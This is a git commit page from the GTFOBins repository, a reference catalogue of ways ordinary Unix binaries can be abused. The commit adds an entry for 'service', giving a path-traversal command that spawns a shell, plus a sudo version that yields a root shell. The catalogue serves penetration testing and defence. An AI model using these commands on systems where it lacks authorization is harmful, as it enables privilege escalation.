1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 00:06:03 +02:00

Add service shell

This commit is contained in:
Andrea Cardaci 2019-03-25 19:54:58 +01:00
parent 13ab3596bb
commit 336abc79bb

7
_gtfobins/service.md Normal file
View File

@ -0,0 +1,7 @@
---
functions:
shell:
- code: /usr/sbin/service ../../bin/sh
sudo:
- code: sudo service ../../bin/sh
---